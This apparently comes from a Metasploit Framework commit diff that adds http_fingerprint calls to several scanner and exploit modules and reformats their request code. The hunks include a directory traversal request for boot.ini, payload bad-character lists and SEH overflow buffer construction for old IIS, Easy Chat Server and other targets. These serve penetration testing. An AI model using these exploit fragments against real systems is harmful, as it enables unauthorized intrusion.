add http_fingerprint calls to modules that use various headers
git-svn-id: file:///home/svn/framework3/trunk@9627 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2ab5983e2a
commit
12fbdcd878
|
@ -42,10 +42,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
}, 25)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => '/',
|
||||
}, 25)
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res and res.code == 200)
|
||||
|
||||
|
@ -133,4 +136,3 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -9,10 +9,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -23,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module tests for directory traversal vulnerability in the UpdateAgent
|
||||
This module tests for directory traversal vulnerability in the UpdateAgent
|
||||
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
|
||||
OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
|
||||
via dot dot sequences in an HTTP request.
|
||||
|
@ -40,17 +38,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(26122),
|
||||
], self.class)
|
||||
[
|
||||
Opt::RPORT(26122),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
|
||||
'method' => 'GET',
|
||||
}, 20)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
|
||||
'method' => 'GET',
|
||||
}, 20)
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res.code >= 200)
|
||||
if (res.body =~ /boot/)
|
||||
|
|
|
@ -22,10 +22,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
super(update_info(info,
|
||||
'Name' => 'JBoss Vulnerability Scanner',
|
||||
'Description' => %q{
|
||||
This module scans a JBoss instance for vulnerablities.
|
||||
This module scans a JBoss instance for a few vulnerablities.
|
||||
},
|
||||
'Version' => '$Revision$',
|
||||
'Author' => [ 'Tyler Krpata' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-0738' ] # VERB auth bypass
|
||||
],
|
||||
'License' => BSD_LICENSE
|
||||
))
|
||||
|
||||
|
@ -39,14 +43,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run_host(ip)
|
||||
print_status("Processing IP #{ip}")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/"+Rex::Text.rand_text_alpha(12),
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain',
|
||||
}, 20)
|
||||
if (xpb = res.headers['X-Powered-By'])
|
||||
print_status("X-Powered-By: #{xpb}")
|
||||
end
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => "/"+Rex::Text.rand_text_alpha(12),
|
||||
'method' => 'GET',
|
||||
'ctype' => 'text/plain',
|
||||
}, 20)
|
||||
|
||||
info = http_fingerprint({ :response => res })
|
||||
print_status(info)
|
||||
|
||||
if(res.body and />(JBoss[^<]+)/.match(res.body) )
|
||||
print_status("JBoss error message: #{$1}")
|
||||
end
|
||||
|
|
|
@ -67,12 +67,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
get_source = Rex::Text.uri_encode("::$data")
|
||||
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "/#{uri}#{get_source}",
|
||||
}, 25)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'GET',
|
||||
'uri' => "/#{uri}#{get_source}",
|
||||
}, 25)
|
||||
|
||||
version = res.headers['Server'] if res
|
||||
if res
|
||||
version = res.headers['Server']
|
||||
http_fingerprint({ :response => res })
|
||||
end
|
||||
|
||||
if vuln_versions.include?(version)
|
||||
print_good("#{target_url} - nginx - Vulnerable version: #{version}")
|
||||
|
|
|
@ -67,6 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'uri' => "/manager/html",
|
||||
'method' => 'GET'
|
||||
}, 25)
|
||||
http_fingerprint({ :response => res })
|
||||
rescue ::Rex::ConnectionError => e
|
||||
vprint_error("http://#{rhost}:#{rport}/manager/html - #{e}")
|
||||
return
|
||||
|
|
|
@ -43,6 +43,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if res and res.code == 200
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
tserver = res.headers['Server']
|
||||
|
||||
if (res.headers['DAV'] == '1, 2') and (res.headers['MS-Author-Via'].match('DAV'))
|
||||
|
@ -54,12 +56,13 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("#{target_host} (#{tserver}) has #{wdtype} ENABLED")
|
||||
|
||||
report_note(
|
||||
:host => target_host,
|
||||
:proto => 'HTTP',
|
||||
:port => rport,
|
||||
:type => wdtype,
|
||||
:data => 'enabled'
|
||||
)
|
||||
{
|
||||
:host => target_host,
|
||||
:proto => 'HTTP',
|
||||
:port => rport,
|
||||
:type => wdtype,
|
||||
:data => 'enabled'
|
||||
})
|
||||
|
||||
else
|
||||
print_status("#{target_host} (#{tserver}) WebDAV disabled.")
|
||||
|
|
|
@ -117,21 +117,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'HTTP',
|
||||
'version' => '1.0',
|
||||
'uri' => datastore['PATH']
|
||||
}, 5)
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'HTTP',
|
||||
'version' => '1.0',
|
||||
'uri' => datastore['PATH']
|
||||
}, 5)
|
||||
|
||||
if res and res['Server']
|
||||
print_status("Found server: #{res['Server']}")
|
||||
info = http_fingerprint({ :response => res })
|
||||
if (info =~ /Sun/)
|
||||
print_status("Found server: #{info}")
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
@ -236,6 +236,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res.code != 200)
|
||||
print_status("The server returned #{res.code} #{res.message}")
|
||||
return Exploit::CheckCode::Safe
|
||||
|
|
|
@ -32,15 +32,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
[ 'CVE', '2002-1643' ],
|
||||
[ 'OSVDB', '4468'],
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html'],
|
||||
|
||||
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2000,
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d",
|
||||
|
||||
'BadChars' => "\x00\x0a\x0d\x25\x2e\x2f\x5c\xff\x20\x3a\x26\x3f\x2e\x3d"
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -56,19 +54,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'RTSP',
|
||||
'version' => '1.0',
|
||||
'uri' => '/'
|
||||
}, 5)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'method' => 'OPTIONS',
|
||||
'proto' => 'RTSP',
|
||||
'version' => '1.0',
|
||||
'uri' => '/'
|
||||
}, 5)
|
||||
|
||||
info = http_fingerprint({ :response => res })
|
||||
if res and res['Server']
|
||||
print_status("Found RTSP: #{res['Server']}")
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
@ -61,17 +61,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
res = send_request_raw(
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 5)
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 5)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/TikiWiki v?([0-9\.]*)/))
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res and res.code == 200 and res.body.match(/TikiWiki v?([0-9\.]*)/))
|
||||
ver = $1
|
||||
#print_status("Detected TikiWiki version #{ver}")
|
||||
ver = ver.split('.')
|
||||
|
@ -89,8 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
@ -62,21 +62,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
res = send_request_raw(
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/TikiWiki 1\.9\.4/))
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res and res.code == 200 and res.body.match(/TikiWiki 1\.9\.4/))
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
@ -81,6 +81,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => '/SecurityGateway.dll'
|
||||
}, 10)
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
if (res and res.headers['Server'] =~ /SecurityGateway (1\..*)$/)
|
||||
case $1
|
||||
when /1\.0\.1/
|
||||
|
@ -98,7 +100,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# handle auto-targeting
|
||||
mytarget = target
|
||||
if target.name =~ /Automatic/
|
||||
|
||||
mytarget = auto_target
|
||||
if mytarget.nil?
|
||||
raise RuntimeError, "Unable to automatically select a target"
|
||||
|
|
|
@ -161,6 +161,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
response = send_request_raw({'uri' => '/'}, 5)
|
||||
|
||||
http_fingerprint({ :response => response })
|
||||
|
||||
if response.nil?
|
||||
print_status("No response to request")
|
||||
return Exploit::CheckCode::Safe
|
||||
|
@ -194,6 +196,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def auto_target
|
||||
response = send_request_raw({'uri' => '/'}, 5)
|
||||
|
||||
http_fingerprint({ :response => response })
|
||||
|
||||
targets_to_try = []
|
||||
|
||||
if response.nil?
|
||||
|
|
|
@ -57,21 +57,28 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'Aug 14 2007',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('PATH', [ true, "Installation path of Easy Chat Server",
|
||||
"C:\\Program Files\\Easy Chat Server" ])
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw
|
||||
def auto_target
|
||||
info = http_fingerprint
|
||||
t = nil
|
||||
if (info =~ /Easy Chat Server\/1\.0/)
|
||||
t = targets[0]
|
||||
end
|
||||
t
|
||||
end
|
||||
|
||||
if res and res['Server'] =~ /Easy Chat Server\/1.0/
|
||||
def check
|
||||
if auto_target
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -79,9 +86,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
val = rand_text_alpha(rand(10) + 1)
|
||||
num = rand_text_numeric(1)
|
||||
|
||||
# exploit buffer.
|
||||
path = datastore['PATH'] + "\\users\\"
|
||||
print_status("path: " + path)
|
||||
|
||||
# exploit buffer.
|
||||
filler = rand_text_alpha(256 - path.length)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
juju = filler + seh
|
||||
|
|
|
@ -51,15 +51,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
response = send_request_raw
|
||||
info = http_fingerprint
|
||||
|
||||
if response and
|
||||
response['Server'] and
|
||||
response['Server'] =~ /.*MailEnable/
|
||||
if (info =~ /.*MailEnable/)
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
|
|
@ -9,10 +9,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
|
@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the w3who.dll ISAPI
|
||||
This module exploits a stack buffer overflow in the w3who.dll ISAPI
|
||||
application. This vulnerability was discovered Nicolas
|
||||
Gregoire and this code has been successfully tested against
|
||||
Windows 2000 and Windows XP (SP2). When exploiting Windows
|
||||
|
@ -35,11 +33,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-1134'],
|
||||
[ 'OSVDB', '12258'],
|
||||
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
|
||||
[ 'BID', '11820'],
|
||||
|
||||
[ 'CVE', '2004-1134' ],
|
||||
[ 'OSVDB', '12258' ],
|
||||
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html' ],
|
||||
[ 'BID', '11820' ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
|
@ -64,44 +61,50 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Dec 6 2004'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def auto_target
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
http_fingerprint({ :response => res })
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
t = nil
|
||||
if (res and res.body =~ /Access Token/)
|
||||
case res.headers['Server']
|
||||
when /5\.1/
|
||||
t = targets[2]
|
||||
else
|
||||
t = targets[1]
|
||||
end
|
||||
end
|
||||
t
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
if (res and res.body =~ /Access Token/)
|
||||
if auto_target
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
mytarget = target
|
||||
if (target.name =~ /Automatic/)
|
||||
mytarget = auto_target
|
||||
else
|
||||
mytarget = target
|
||||
end
|
||||
|
||||
if(mytarget.name =~ /Automatic/)
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URL']
|
||||
}, -1)
|
||||
|
||||
# Was a vulnerable system detected?
|
||||
if (res and res.body =~ /Access Token/)
|
||||
case res.headers['Server']
|
||||
when /5\.1/
|
||||
mytarget = targets[2]
|
||||
else
|
||||
mytarget = targets[1]
|
||||
end
|
||||
else
|
||||
print_error("No valid target found")
|
||||
end
|
||||
if not mytarget
|
||||
raise RuntimeError, "No valid target found"
|
||||
end
|
||||
|
||||
buf = rand_text_english(8192, payload_badchars)
|
||||
|
@ -120,4 +123,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue